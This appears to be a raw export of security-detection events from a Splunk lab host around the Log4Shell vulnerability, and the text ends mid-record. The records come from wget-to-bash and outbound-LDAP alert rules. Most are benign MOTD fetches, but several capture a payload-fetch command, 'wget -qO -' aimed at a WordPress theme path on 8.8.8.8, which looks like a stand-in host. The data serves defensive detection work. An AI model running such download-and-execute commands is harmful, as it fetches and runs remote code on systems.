1642999416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642993441", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-24T03:04:01", parent_process_id="18830", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18874", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS 
attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642999416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642993441", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-24T03:04:01", parent_process_id="18830", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18874", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 
attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642967015, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642962361", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-23T18:26:01", parent_process_id="18000", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 
Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18038", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642967015, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642962361", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-23T18:26:01", parent_process_id="18000", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18038", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642877016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642870681", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-22T16:58:01", parent_process_id="15155", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="15195", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642877016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642870681", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-22T16:58:01", parent_process_id="15155", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="15195", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", 
risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642776216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642772581", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T13:43:01", parent_process_id="12336", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error 
https://motd.ubuntu.com", process_id="12375", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642776216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642772581", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T13:43:01", 
parent_process_id="12336", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="12375", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642733016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642729148", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T01:39:08", parent_process_id="11090", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="11128", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642733016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", 
annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642729148", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T01:39:08", parent_process_id="11090", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="11128", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642725815, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642719022", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:50:22", parent_process_id="10827", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10829", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642725815, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642719022", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:50:22", parent_process_id="10827", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10829", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642723157, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", 
annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-20T22:46:56", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T22:49:21", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642723157, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", 
annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-20T22:46:56", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T22:49:21", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718946", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:49:06", parent_process_id="10815", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10816", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of 
